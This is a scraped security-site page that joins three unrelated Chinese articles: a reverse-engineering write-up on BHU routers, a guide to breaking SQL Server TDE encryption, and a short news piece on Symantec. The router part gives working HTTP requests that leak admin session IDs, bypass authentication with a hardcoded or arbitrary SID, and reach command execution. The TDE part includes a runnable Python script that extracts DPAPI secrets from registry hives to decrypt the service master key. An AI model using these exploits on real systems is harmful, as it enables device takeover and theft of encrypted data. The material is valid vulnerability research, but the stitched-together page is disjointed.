LOAD:004012C4???? ????????????lw????? $a0, file_syslog? # “syslog”

LOAD:004012C8???????????????? addu??? $v0, $a1, $v1

(20)?# 文件的值是否是 “syslog”?

LOAD:004012CC???? ????????????jalr??? $t9 ; strcmp

LOAD:004012D0???????????????? sb????? $zero, 0($v0)

LOAD:004012D4???????????????? lw????? $gp, 0x60+var_50($sp)

(21)?# Jump if value offile” != “syslog” (如果file参数的值不是syslog,那么就jump)

LOAD:004012D8???? ????????????bnez??? $v0, loc_not_syslog

LOAD:004012DC???????????????? addiu?? $v0, $s0, (file_syslog – 0x410000)

(22)?# Return “/var/syslog” if “syslog” (如果是syslog,那么就读取/var/syslog文件)

LOAD:004012E0?? ??????????????lw????? $v0, (path_syslog – 0x416500)($v0)? # “/var/syslog”

LOAD:004012E4???????????????? b

loc_4012F0 LOAD:004012E8???????????????? nop

LOAD:004012EC? # —————————————————————————

LOAD:004012EC LOAD:004012EC loc_4012EC:????????????????????????????? # CODE XREF: get_file_handler+C8|j

??????????????????????????(23)?# 其它情况返回NULL(空值)

LOAD:004012EC?? ??????????????move??? $v0, $zero

上面这个函数主要是说明,如果file参数的值是syslog,那么就会读取var目录下的syslog文件。我花了点时间对于这个页面的参数进行了一些分析得出以下结论:

1. page=[<html页面的名称>]

参数值末端都以.html结尾

打开文件,并且返回值

我尝试过去读取其它文件,但是没用,它只能读取HTML文件

2.xml=[<配置名称>]

访问配置名称

XML类型的值

3.file=[syslog]

访问/var/syslog文件

打开文件并且返回内容

4. cmd=[system_ready]

可以返回管理员密码的第一个和最后一个明文信息,可以提升暴力破解的成功率。

该漏洞还有30秒到达战场

我比较在意的是“file”参数。一般调用系统文件都需要二次验证的,比如cookie,ssid之类的,而且系统日志大部分都有脱敏,不会保留什么敏感信息,但是事实呢?

我于是尝试构造了一个请求。

GET /cgi-bin/cgiSrv.cgi?file=[syslog]?HTTP/1.1

Host: 192.168.62.1

X-Requested-With: XMLHttpRequest

Connection: close

返回的数据包:

HTTP/1.1 200 OK

Content-type: text/plain

Jan? 1 00:00:09 BHU syslog.info syslogd started: BusyBox v1.19.4

Jan? 1 00:00:09 BHU user.notice kernel: klogger started!

Jan? 1 00:00:09 BHU user.notice kernel: Linux version 2.6.31-BHU (yetao@BHURD-Software) (gcc version 4.3.3 (GCC) ) #1 Thu Aug 20 17:02:43 CST 201

/* [omitted] */

Jan? 1 00:00:11 BHU local0.err dms[549]:?Admin:dms:3 sid:700000000000000 id:0 login

/* [omitted] */

Jan??1 08:02:19 HOSTNAME local0.warn dms[549]:?User:admin sid:2jggvfsjkyseala index:3 login

居然包含了管理员的cookie,sid等信息。但是,或许这个cookie是历史cookie,没办法继续使用,你不信?那么我给你演示一下。我用这个cookie带入了一个路由器重启界面,然后,路由器居然重启了??!!

QQ截图20160823172423.png

但是这个漏洞利用起来还是有一些缺陷,假设管理员没登陆过系统,或者把登陆记录清楚了,那么怎么办呢?注意看上面的数据包,它还返回了一个sid:700000000000000。我初步看了一下,所有的必虎路由器的管理员SID都是700000000000000,并且管理员都没有办法更改它。那么我们可否把SID当作cookie来用?答案是可以的,如下图所示。

QQ截图20160823174012.png

该漏洞已经大杀特杀

虽然我们已经有管理员权限了,但是我们继续看看还有什么可以利用的地方。我继续使用IDA检查了POST的函数处理模块,然而它似乎比GET类型的函数模块更加可怕。

img5.png

我把这些if模块又分成了A,B,C三个模块,让我们先看看A模块吧。

LOAD:00403424???????????????? la????? $t9, cgi_input_parse

LOAD:00403428???????????????? nop

(24)?# 调用 cgi_input_parse()

LOAD:0040342C??? ?????????????jalr??? $t9 ; cgi_input_parse

LOAD:00403430???????????????? nop

LOAD:00403434???????????????? lw????? $gp, 0x658+var_640($sp)

(25)?# arg1 = “op”

LOAD:00403438??? ?????????????la????? $a1, aOp???????? # “op”

LOAD:00403440???????????????? la????? $t9, find_val

(26)?# arg0 = request的Body部分

LOAD:00403444? ???????????????move??? $a0, $v0

(27)?# 得到“op”参数的值

LOAD:00403448??? ?????????????jalr??? $t9 ; find_val

LOAD:0040344C???????????????? move??? $s1, $v0

LOAD:00403450???????????????? move??? $s0, $v0

LOAD:00403454???????????????? lw????? $gp, 0x658+var_640($sp)

(28)?# 如果没有“op”参数,那么就退出

LOAD:00403458??? ?????????????beqz??? $s0, b_exit

这个模块会对POST请求进行解析,并且调用cgi_input_parse()。,并且在(25)部分尝试提取参数op的值。而op的值主要是通过find_val函数调用body的部分得到的。如果op有值,就进行到B模块,否则就执行退出。那么我们再来看看B模块的逆向。

LOAD:004036B4???????????????? la????? $t9, strcmp

(29)?# arg1 = “reboot”

LOAD:004036B8??? ?????????????la????? $a1, aReboot???? # “reboot”

(30)?# “op” 的值是否是“reboot”?

LOAD:004036C0?????? ??????????jalr??? $t9 ; strcmp

(31)?# arg0 = body[“op”]

LOAD:004036C4? ???????????????move??? $a0, $s0

LOAD:004036C8???????????????? lw????? $gp, 0x658+var_640($sp)

LOAD:004036CC???????????????? bnez??? $v0, loc_403718

LOAD:004036D0???????????????? lui???? $s2, 0x40

这里主要说明,如果op参数的值是reboot,那么会继续到C模块。

(32)?# 检查cookie中的SID值

LOAD:004036D4??????? ?????????jal???? get_cookie_sid

LOAD:004036D8???????????????? nop

LOAD:004036DC???????????????? lw????? $gp, 0x658+var_640($sp)

(33)?# SID的Cookie将作为dml_dms_ucmd的第一个参数传递

LOAD:004036E0???????????????? move??? $a0, $v0

LOAD:004036E4???????????????? li????? $a1, 1

LOAD:004036E8???????????????? la????? $t9, dml_dms_ucmd

LOAD:004036EC???????????????? li????? $a2, 3

LOAD:004036F0???????????????? move??? $a3, $zero

(34)?# 分发任务给dml_dms_ucmd

LOAD:004036F4???????????????? jalr??? $t9 ; dml_dms_ucmd

LOAD:004036F8???????????????? nop

首先,它会先调用一个函数,我把它叫做get_cookie_sid(32部分),然后再把值赋予给dml_dms_ucmd(33部分),然后再调用它(34部分)。随后又会进行到下一步。

(35)?# 在v1参数内保存返回的值

LOAD:004036FC???????????????? move??? $v1, $v0

LOAD:00403700???????????????? li????? $v0, 0xFFFFFFFE

LOAD:00403704???????????????? lw????? $gp, 0x658+var_640($sp)

(36)?# Is v1 != 0xFFFFFFFE? (v1是否不等于0xFFFFFFFE?)

LOAD:00403708???????????????? bne???? $v1, $v0, loc_403774

LOAD:0040370C???????????????? lui???? $a0, 0x40

(37)?# If v1 == 0xFFFFFFFE jump to error message (如果v1等于0xFFFFFFFE,那么就跳转到错误信息)

LOAD:00403710???????????????? b?????? loc_need_login

LOAD:00403714???????????????? nop

/* [omitted] */

LOAD:00403888 loc_need_login:????????????????????????????? # CODE XREF: handle_post+9CC|j

LOAD:00403888???????????????? la????? $t9, mime_header

LOAD:0040388C???????????????? nop

LOAD:00403890???????????????? jalr??? $t9 ; mime_header

LOAD:00403894???????????????? addiu?? $a0, (aTextXml – 0x400000)? # “text/xml”

LOAD:00403898???????????????? lw????? $gp, 0x658+var_640($sp)

LOAD:0040389C???????????????? lui???? $a0, 0x40

(38)?# 输出错误信息“need_login”

LOAD:004038A0???????????????? la????? $t9, printf LOAD:004038A4?????? b?????? loc_4038D0

LOAD:004038A8???????????????? la????? $a0, aReturnItemResu? # “<return>\n\t<ITEM result=\”need_login\””

但是假设我们不带入然后值到v1参数(即SID为NULL),那么会怎么样呢?我于是尝试了一下。

QQ截图20160823190916.png

然后我分析了一下这整个程序的逻辑:

1.收到op参数

2.调用get_cookie_sid

3.调用dms_dms_ucmd

虽然在GET模块,这个指令应该会执行的,但是在POST的过程中始终会验证SID,这个就有点蛋疼了。怎么绕过去呢?

继续分析get_cookie_sid函数模块。

LOAD:004018C4 get_cookie_sid:????????????????????????? # CODE XREF: get_xml_handle+20|p

/* [omitted] */

LOAD:004018DC???????????????? la????? $t9, getenv

LOAD:004018E0???????????????? lui???? $a0, 0x40

(39)?# 得到HTTP cookies

LOAD:004018E4???????????????? jalr??? $t9 ; getenv

LOAD:004018E8???????????????? la ?????$a0, aHttp_cookie? # “HTTP_COOKIE”

LOAD:004018EC???????????????? lw????? $gp, 0x20+var_10($sp)

LOAD:004018F0???????????????? beqz??? $v0, failed

LOAD:004018F4???????????????? lui???? $a1, 0x40

LOAD:004018F8???????????????? la????? $t9, strstr

LOAD:004018FC???????????????? move??? $a0, $v0

(40)?# cookie中是否包含“sid=”?

LOAD:00401900???????????????? jalr??? $t9 ; strstr

LOAD:00401904???????????????? la????? $a1, aSid??????? # “sid=”

LOAD:00401908???????????????? lw????? $gp, 0x20+var_10($sp)

LOAD:0040190C???????????????? beqz??? $v0, failed

LOAD:00401910???????????????? move??? $v1, $v0

/* [omitted] */

LOAD:00401954 loc_401954:????????????????????????????? # CODE XREF: get_cookie_sid+6C|j

LOAD:00401954????????????? ???addiu?? $s0, (session_buffer – 0x410000)

LOAD:00401958

LOAD:00401958 loc_401958:????????????????????????????? # CODE XREF: get_cookie_sid+74|j

LOAD:00401958???????????????? la????? $t9, strncpy

LOAD:0040195C???????????????? addu??? $v0, $a2, $s0

LOAD:00401960???????????????? sb????? $zero, 0($v0)

(41)?# 在“session_buffer”中复制cookie的值

LOAD:00401964???????????????? jalr??? $t9 ; strncpy

LOAD:00401968???????????????? move??? $a0, $s0

LOAD:0040196C???????????????? lw????? $gp, 0x20+var_10($sp)

LOAD:00401970???????????????? b?????? loc_40197C

(42)?# 把这个值赋予cookie

LOAD:00401974???????????????? move??? $v0, $s0

get_session_cookie在得到一个请求后,会检查cookie中是否有sid=这个字符集。如果有,那么某处全局变量将会赋值一个cookie给该参数。当调用dml_dms_ucmd时,返回的值都会用作于第一个参数,而这一切都是在libdml.so函数库中实现。那么也就是说,对于cookie的效验都是在这个库中进行的,那么让我们来看一下这个库。

.text:0003B368 .text:0003B368???????????????? .globl dml_dms_ucmd

.text:0003B368 dml_dms_ucmd:

.text:0003B368

/* [omitted] */

.text:0003B3A0???????????????? move??? $s3, $a0

.text:0003B3A4???????????????? beqz??? $v0, loc_3B71C

.text:0003B3A8???????????????? move??? $s4, $a3

(43)?# 记住 a0 = SID cookie的值

???????????????????????????????# 或者可以说是,如果a0什么都不包含(NULL),那么s1 = 0xFFFFFFFE

.text:0003B3AC???????????????? beqz??? $a0, loc_exit_function

.text:0003B3B0???????????????? li????? $s1, 0xFFFFFFFE

/* [omitted] */

.text:0003B720 loc_exit_function:?????????????????????????? # CODE XREF: dml_dms_ucmd+44|j

.text:0003B720????????????????????????????????????????? # dml_dms_ucmd+390|j …

.text:0003B720???????????????? lw????? $ra, 0x40+var_4($sp)

???????????????????????????(44)?# 返回 s1 (s1 = 0xFFFFFFFE)

.text:0003B724???????????????? move??? $v0, $s1

/* [omitted] */

.text:0003B73C???????????????? jr????? $ra

.text:0003B740???????????????? addiu?? $sp, 0x40

.text:0003B740? # End of function dml_dms_ucmd

只要我第一个参数不要带入空(NULL),那么就不会返回0xFFFFFFFE(-2)。也就是说我cookie随便填写一个都可以成为管理员?!

QQ截图20160823194419.png

好吧,我随便写了个cookie,然后进行重启,依然生效了。。。。。花费那么长时间,居然发现cookie可以随意设定!但是一切都是值得的,我起码知道这个问题出在哪里了。

漏洞已经跑到对方血池大杀特杀了

我简单整理了一下前面的工作,然后总结出以下方法可以得到管理员权限:

1. SID写任意字符,只要不为空就行。

2. 查看系统日志得到管理员的cookie

3. SID的值为700000000000000即可

我们现在已经知道了POST模块的处理过程和op参数的基本逻辑,但是这个模块还可以处理一些XML请求,让我们对它继续分析下去。

/* [omitted] */

LOAD:00402E2C???????????????? addiu?? $a0, $s2, (aContent_type – 0x400000)? # “CONTENT_TYPE”

LOAD:00402E30???????????????? la????? $t9, getenv

LOAD:00402E34???????????????? nop

(45)?# 收到“CONTENT_TYPE”的请求

LOAD:00402E38???????????????? jalr??? $t9 ; getenv

LOAD:00402E3C???????????????? lui???? $s0, 0x40

LOAD:00402E40???????????????? lw????? $gp, 0x658+var_640($sp)

LOAD:00402E44???????????????? move??? $a0, $v0

LOAD:00402E48???????????????? la????? $t9, strstr

LOAD:00402E4C???????????????? nop

(46)?# 是否属于“text/xml” 请求?

LOAD:00402E50???????????????? jalr??? $t9 ; strstr

LOAD:00402E54???????????????? addiu?? $a1, $s0, (aTextXml – 0x400000)? # “text/xml”

LOAD:00402E58???????????????? lw????? $gp, 0x658+var_640($sp)

LOAD:00402E5C???????????????? beqz??? $v0, b_content_type_specified

/* [omitted] */

(47)?# 得到SID cookie的值

LOAD:00402F88??????????????? ?jal???? get_cookie_sid

LOAD:00402F8C???????????????? and???? $s0, $v0

LOAD:00402F90???????????????? lw????? $gp, 0x658+var_640($sp)

LOAD:00402F94???????????????? move??? $a1, $s0

LOAD:00402F98???????????????? sw????? $s1, 0x658+var_648($sp)

LOAD:00402F9C ????????????????la????? $t9, dml_dms_uxml

LOAD:00402FA0???????????????? move??? $a0, $v0

LOAD:00402FA4???????????????? move??? $a2, $s3

(48)?# 调用‘dml_dms_uxml’函数模块, 并且对body部分和cookie进行效验

LOAD:00402FA8????????????? ???jalr??? $t9 ; dml_dms_uxml

LOAD:00402FAC???????????????? move??? $a3, $s2

继续往下看,貌似dml_dms_uxml比dml_dms_ucmd更加奇葩。

.text:0003AFF8???????????????? .globl dml_dms_uget_xml

.text:0003AFF8 dml_dms_uget_xml:

/* [omitted] */

(49)?# 把SID的值复制到s1内

.text:0003B030???????????????? move??? $s1, $a0

.text:0003B034???????????????? beqz??? $a2, loc_3B33C

.text:0003B038???????????????? move??? $s5, $a3

???????????????????????????(50)?# 如果SID的值为空(NULL)

.text:0003B03C???????????????? bnez??? $a0, loc_3B050

.text:0003B040???????????????? nop

.text:0003B044???????????????? la????? $v0, unk_170000

.text:0003B048???????????????? nop

???????????????????????????(51)?# 那么就把空的SID值替换为一个硬件编码(700000000000000

.text:0003B04C???????????????? addiu?? $s1, $v0, (a70000000000000 – 0x170000)? # “700000000000000”

/* [omitted] */

这个逻辑的感觉就好像是,如果你的没有钱买东西,那么我会给你钱去消费。OMG!真TM人性化的设计!总的来说,如果要使用这个功能,cookie可以直接为空。那么可以构造数据包如下:

POST /cgi-bin/cgiSrv.cgi HTTP/1.1

Host: 192.168.62.1

Content-Type: text/xml

X-Requested-With: XMLHttpRequest

Content-Length: 59

Connection: close

<cmd>

<ITEM?cmd=“traceroute”?addr=“127.0.0.1” />

</cmd>

继续研究发现还可以命令执行:

QQ截图20160824123149.png

这个路由器就像个定时炸弹一样,搞一台在家里面可能莫名其妙的就被人家装上后门监听着了。

* 参考来源:ioactive,本文由Arthur编译,转载请注明来自FreeBuf(Freebuf.COM)

这些评论亮了

  • tonybreak(3级)回复
    支持!这种分析让新手的我学到不少了啊~怎么现在有一种看到路由器都想拆的冲动呀~
    )9(亮了
发表评论

已有 14 条评论

  • tonybreak?(3级)?2016-08-25回复1楼

    支持!这种分析让新手的我学到不少了啊~怎么现在有一种看到路由器都想拆的冲动呀~

    亮了(9)
    • zhutougg?2016-08-25回复

      @ tonybreak? 拆吧,反正你会再会一个的

      亮了(0)
  • He1el?2016-08-25回复2楼

    中出FB客服妹纸。。。

    亮了(3)
  • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-08-25回复3楼

    我:队长!我们中出了一个He1el!
    队长:你们怎么处置他的?!
    我:我刚才不是说了嘛

    亮了(2)
  • 必虎广告?2016-08-25回复4楼

    最近到处能看到必虎广告

    亮了(0)
    • 必虎广告?2016-08-25回复

      @ 必虎广告 看看广告,再看看这篇,有种莫名的喜感

      亮了(1)
  • raistlin00?(4级)?2016-08-25回复5楼

    必虎和奇虎啥关系啊

    亮了(0)
    • 鬼魅羊羔?(4级)网络尖刀的小屌丝一枚。?2016-08-25回复

      @ raistlin00? 隔壁老王的关系。

      亮了(1)
  • 腾讯手机管家?2016-08-25回复6楼

    这算漏洞的话 电信每个光猫都有漏洞了,我会瞎说

    亮了(0)
    • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-08-25回复

      @ 腾讯手机管家 我只信你说的最后四个字 :wink:

      亮了(0)
      • 腾讯手机管家?2016-08-25回复

        @ ArthurKiller? 电信光猫裸奔三倍速啊

        亮了(1)
      • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-08-25回复

        @ 腾讯手机管家 警察叔叔,就是他!

        亮了(0)
  • subry?(1级)?2016-08-25回复7楼

    感觉原文后面的料更劲爆啊。。 :mrgreen:

    亮了(0)
  • nklper?2016-08-26回复8楼

    这种看似严谨的文章,很具有误导性。 能当面向大家演示如何利用最好了。

    亮了(1)
表情插图

取消

ArthurKiller

ArthurKiller

窃.格瓦拉驻FreeBuf办事处

58 篇文章343 条评论

相关阅读

  • BoxSoft WAV to MP3 Converter 软件漏洞分析(CVE-2015-7243)
  • Oracle out-of-band release for Java SE Vulnerability漏洞分析(CVE-2016-0636)
  • nginx爆整数溢出漏洞最新情况(2013-04-29)
  • 由家用路由器构成的可“自我复制”僵尸网络
  • [技术分析]波士顿爆炸案Redkit漏洞利用包解析

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

tde

tde

投稿

微软SQL Server透明数据加密(TDE)剖析及破解(上)

FireFrank2016-03-24+5128727人围观 ,发现 1 个不明物体安全管理网络安全

本次调查开始于一个我和客户讨论:他们是否应该安装TDE。如果我们要选出一个最合适的进行静态数据加密的工具,那么非TDE莫属,但是它有一个明显的缺陷。

视频

任何加密自己数据的软件都有一个功能性问题:如果它希望使用自己的数据,就需要对自身数据进行解密。举个例子,如果SQL服务器想要向加密数据库中写入数据,之后把数据返回给用户,他需要合适的解密密钥进行这个操作。

如果系统还需要在无需人工干预的情况下就可以boot,敏感功能无法被单独嵌入到保护性硬件中,之后密钥必须储存在系统的某个位置中,以便服务器在启动时能够访问它。然而,如果密钥被存储在系统中,那所有人都有接入权限,如果整个系统被北方,密钥也会被备份,所以所有数据都会被轻易读取。

“很明显”,解决方法是在储存所有数据之前加密密钥,微软的TDE就是这么做的。不幸的是,它并没有真的解决这个问题,因为为了解密这个已经加密的密钥,你还需要存储这个用于解密的密钥。所有的这些花里胡哨的行为都是为了掩饰密钥的存储。

显然解决方法还是加密加密的密钥…而这么做的工具呢还是微软的TDE,但是它还是存在相同的问题。它一直这么做。虽然最终你不得不停止增加层数并存储最底层的为加密密钥,只要找到这个密钥,那所有的加密就会瞬间土崩瓦解。

这种基本的、不可避免的逻辑必然性让很多人选择拒绝使用这个软件。大家不相信这样一个看似毫无意义、甚至毫无诚信可言的安全机制是由如此大型的公司出售的,简直太可怕了。一些人必须要看到这个机制之后才能相信,所以我们决定用这篇文章详细解释TDE以及如何破解TDE。

TDE加密

在我们开始破解TDE之前,让我们先看看所有数据是如何被加密的。下面这张图提供了我们所需要的所有加密步骤。如果这种方法不是模糊安全的模范,那我不知道这是什么了。

tde.jpg

实际上是略有变化的,因为在一些情况下,访问相同数据的路径有很多,还有一些整个过程中非常微妙的地方并没有被提到。给出的路径是我们最感兴趣的问题,因为路径很容易被复制。

我们从底层开始介绍,底层最基础的密钥匙LSA密钥,其他层都在这层之上。它被轻微模糊处理(“代替密码”)后储存在磁盘上的注册表中,但是这点是众所周知的,所以它所提供的方式并不安全。

由于LSA密钥和其他几个密钥都储存在其他文件中,整个体系就会分裂。蓝色图表表明啦包含各种信息关键部分的基础文件:

1、注册表备份或者来自%WINDIR%/System32/Config的配置单元文件SYSTEM,SECURITY和SOFTWARE

2、来自%WINDIR%/System32/Microsoft/Protect/S-1-5-18的DPAPI的主键

3、主数据库和目标用户数据库。数据库可以从一个SQL备份文件或raw .mdf文件中恢复。在使用.mdf文件恢复时,拥有相应的.ldf数据库日志文件尽管不是必须的,但是也非常有用。

在知道这些信息后,所有的加密密钥都可以无需暴力破解直接恢复。

破解TDE

从SQL server的角度看,掌控所有的密钥就是Sevice Master Key(SMK)。对每个服务器/集群来说,它都是独一无二的,保护着它上面的每一层。它被储存在从未使用TDE中加密的主数据库中。然而,它在主数据库中被储存成一个加密值,所以还是需要解密。

破解TDE的一般方法是从目标服务区或者备份中拷贝数据库,然后把数据库放在一个新的由我们控制的“恢复”SQL服务器中。通过复制SMK,所有的加密的数据库都会自动被恢复服务器上的SQL服务器自动解密。恢复服务器上的数据可以被查看、导出等。所以我们不需要完全了解SQL服务器使用数据库加密密钥做了什么,因为我们将使用它对付它自己来为我们解密所有内容。

下面这个简单的python脚本用于文件收集以及提取SMK。涉及到的大部分工作都在恢复DPAPI密钥,多亏了creddump和dpapick项目出色的工作,我们成功拿到了这个密钥。

#!/usr/bin/env python 
# -*- coding: utf-8 -*- 

from DPAPI.Core import blob # https://pypi.python.org/pypi/dpapick/0.3 
from DPAPI.Core import masterkey 
from DPAPI.Core import registry 
from optparse import OptionParser 
from Registry import Registry # https://github.com/williballenthin/python-registry 
from bitstring import ConstBitStream 

import re 
import os 
import sys 

def search_with_blob(entropy, dpapi_system, mkp, tdeblob): 
  """Try decrypting with each master key""" 
  wblob = blob.DPAPIBlob(tdeblob) 
  mks = mkp.getMasterKeys(wblob.mkguid) 
  for mk in mks: 
    if mk.decrypted: 
      wblob.decrypt(mk.get_key(), entropy) 
      if wblob.decrypted: 
        print("Decrypted service master key: %s" % wblob.cleartext.encode('hex')) 
      else: 
        print("Decryption failed") 

def search_with_entropy(entropy, dpapi_system, mkp, masterdb): 
  """Search for DPAPI blobs in master database""" 
  masterdb = ConstBitStream(filename = options.masterdb) 
  for found in masterdb.findall('0x01000000D08C9DDF0115D1118C7A00C04FC297EB', bytealigned = True): 
    blobsegment = masterdb[found:found+512*8]  # Extraneous bytes ignored 
    search_with_blob(entropy, dpapi_system, mkp, blobsegment.tobytes()) 

parser = OptionParser() 
parser.add_option("--masterkey", metavar='DIRECTORY', dest='masterkeydir') 
parser.add_option("--system", metavar='HIVE', dest='system') 
parser.add_option("--security", metavar='HIVE', dest='security') 
parser.add_option("--software", metavar='HIVE', dest='software') 
parser.add_option("--masterdb", metavar='FILE', dest='masterdb') 

(options, args) = parser.parse_args() 

reg = registry.Regedit() 
secrets = reg.get_lsa_secrets(options.security, options.system) 
dpapi_system = secrets.get('DPAPI_SYSTEM')['CurrVal'] 

mkp = masterkey.MasterKeyPool() 
mkp.loadDirectory(options.masterkeydir) 
mkp.addSystemCredential(dpapi_system) 
mkp.try_credential_hash(None, None) 

with open(options.software, 'rb') as f: 
  reg = Registry.Registry(f) 
  regInstances = reg.open('Microsoft\\Microsoft SQL Server\\Instance Names\\SQL') 
  for v in regInstances.values(): 
    print("Checking SQL instance %s" % v.value()) 
    regInst = reg.open('Microsoft\\Microsoft SQL Server\\%s\\Security' % v.value()) 
    entropy = regInst['Entropy'].value() 
    search_with_entropy(entropy, dpapi_system, mkp, options.masterdb) 

方便的是,脚本是跨平台的,所以它不需要在Windows机器上运行。这就意味着在目标服务区上不需要安装软件,一些文件渗出(或使用备份)就可以了。

一旦DPAPI密钥被恢复了,这个脚本搜索主数据库获得加密的SMK。这些SMK使用特殊的DPAPI blob结构被加密。DPAPI结构总是包含供应商GUID:df9d8cd0-1501-11d1-8c7a-0c04fc297eb,这个ID很容易被找到。由于主数据库未被加密,我们可以只使用SQL server就能提取ID,但是需要更多的协调和尝试。因为GUID非常受限制,这种快速且卑鄙的在主数据库中直接搜索方法被用于证明概念。这也意味着即使文件格式不同,它也同样适用于SQL备份文件或者本地.dmf文件。

执行只指向所需文件,然后继续:

$ ./tde.py --masterkey=S-1-5-18 --system=SYSTEM --security=SECURITY --software=SOFTWARE --masterdb=master.mdf

其结果是简单的未加密SMK:

Decrypted service master key: 999338193ab37c38c3aa99df062e2f5ca96b7dbc87542af9d61e0dc8a473c1f9

SQL Server有一个方式备份并恢复SMK,使用命令行:

BACKUP SERVICE MASTER KEY TO FILE = 'some-file-to-write-to' 
    ENCRYPTION BY PASSWORD = 'some-password' 

另外,他们可以被恢复到一个新的服务器,使用命令行:

RESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' 
    DECRYPTION BY PASSWORD = 'some-password' [FORCE]

另外一些主服务器密钥也可以利用SMK恢复来被解密,数据库访问。不幸的是,我们没有来自目标机器的SMK的备份文件(实际上在很多攻击的情况下,我们可以只知性备份命令,但是没有进行备份恢复等)。

在这个例子里,我们有一个恢复等原始密钥,但是没有备份文件,一个明显的安装SMK的方式是在恢复计算机上使用DPAPI系统凭证加密SMK,然后储存在主数据库中。dpapick库目前并不支持加密,我很烦躁啊,所以我跳过了现在这个不花太多时间和精力的方法。相反,我使用了那种快速卑鄙的方法,创建一个SMK备份文件,但是它手动操作较多。这些都是可以被简化的,但是为了证明这个概念,我使用了一个简单的cuckoo’s egg方法,视频中展示了这个方法-终端到中断的恢复demo。这种方法使用恢复密钥生成一个SMK备份文件,我们可以再我们的恢复SQL server上进行恢复。

下面这些步骤是使用新的SMK备份文件恢复一个TDE备份(来自.bak文件)来恢复服务器:

1、使用单用户模式启动SQL server(-m startup option)

2、恢复主数据库

RESTORE DATABASE MASTER FROM DISK = 'c:\...\master.bak' WITH REPLACE;

3、重启SQL服务(仍然是单用户模式)

4、添加管理员用户/重置管理员密码

5、在普通多用户模式下重启服务

6、使用FORCE选项恢复SMK

ESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' 
    DECRYPTION BY PASSWORD = 'some-password' FORCE

7、恢复目标数据库

8、刷新数据库列表

下面这些步骤用于恢复.MDF/.LDF文件:

1、停止SQL服务

2、复制 .mdf/.ldf文件,代替现在的主数据库

3、在单用户模式下开启SQL服务器(-m startup option)

4、增加管理员用户/重置管理员密码

5、在普通多用户模式下重启服务

6、使用FORCE选项恢复SMK

RESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' 
    DECRYPTION BY PASSWORD = 'some-password' FORCE

7、离线拿下目标数据库

8、让目标数据库再次在线

9、刷新数据库列表

在这点上,我们完全恢复并能够访问加密数据库

在上面的内容中,我们介绍了TDE机制及如何破解TDE,之后的文章我们将继续深入TDE,揭秘是否应该继续使用TDE。

* 原文链接:simonmcauliffe,FB小编FireFrank编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

发表评论

已有 1 条评论

  • fs?2016-03-24回复1楼

    很详细,不错!

    亮了(4)
表情插图

取消

FireFrank

FireFrank

这家伙太懒,还未填写个人描述!

65 篇文章1 条评论

相关阅读

  • FreeBuf公开课:轻松的方式科普什么是SQL注入攻击(第三集)
  • 优化SQLMAP的批量测试功能
  • 微软将会修复两个严重漏洞,涉及Windows和IE浏览器
  • 微软SQL Server透明数据加密(TDE)剖析及破解(上)
  • 微软“WebDAV”提权漏洞(cve-2016-0051)初探

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

赛门铁克杀毒软件

赛门铁克杀毒软件

投稿

赛门铁克想要重新发明杀毒软件

Mystery2014-05-08+564861人围观 ,发现 13 个不明物体资讯

?

2010年5月19日,加州科尔马镇,迈克菲安全软件和赛门铁克的诺顿杀毒软件被一同摆在货架上

25年前,赛门铁克(Symantec Corp.)发明了商用杀毒软件来保护电脑免遭黑客的攻击。如今,该公司称这样的战术注定将失败。

赛门铁克负责信息安全的高级副总裁戴伊(Brian Dye)说,杀毒软件已死,他们认为杀毒软件无论如何都不再是一项赚钱的业务。

杀毒软件的目的在于防止黑客侵入电脑。但如今不管有没有杀毒软件的保护,黑客常常会侵入电脑。有鉴于此,戴伊正在牵头赛门铁克的一项再造行动,该行动反映出每年规模达700亿美元的网络安全行业出现了更广泛的转变。

多家公司开发的新技术不是努力防止黑客的侵入,而是假定黑客已侵入,如何想方设法找到他们并将损失降至最低。

赛门铁克本周也加入这些公司的队伍,将创建自己的响应小组来帮助被黑客入侵的企业。六个月内,该公司计划销售有关具体威胁的情报介绍,以便使客户不仅知道自己被攻击,还知道为何被攻击。此外,赛门铁克还正在开发一种在网络内寻找更先进恶意软件的技术。

戴伊说,赛门铁克不打算放弃诺顿(Norton)杀毒软件,但将在新的产品线中寻找收入增长点。他表示,如果客户从防止黑客入侵转变为对黑客攻击进行侦测和响应,那么收入增长就将来自侦测和响应。

利用0day漏洞的恶意程序日益增多,杀毒软件赶不上漏洞发现的速度,无法阻止黑客入侵,虽然这就是它们存在的目的。既然无力阻止恶意程序感染用户的电脑,杀毒软件开发商使用的策略显然有问题,赛门铁克为此表示要重塑安全行业:不是防止黑客侵入,而是假定黑客已侵入,如何将用户数据损失降至最小。赛门铁克准备从防止黑客入侵转变为对黑客攻击进行侦测和响应,告诉客户是否被攻击,以及为何会被攻击。

发表评论

已有 13 条评论

  • jacker?(6级)Ubuntu Arch Vim爱好者?2014-05-08回复1楼

    开来有要出卖杀毒软件了

    亮了(1)
  • ws?2014-05-08回复2楼

    不卖软件卖服务了么

    亮了(0)
  • 584250550?(1级)?2014-05-08回复3楼

    在黑客面前,杀软厂商自愧不如啊

    亮了(4)
  • notme?2014-05-08回复4楼

    早就这样了,不然黑阔是吃饱了撑着才做苦逼免杀做绕过?

    亮了(0)
  • flowind?2014-05-09回复5楼

    消耗大量资金收购0day..
    针对0day向公司出售补丁.
    在linux或者windows发布补丁之前就用上安全就好很多.

    亮了(0)
  • YiffyYan?2014-05-09回复6楼
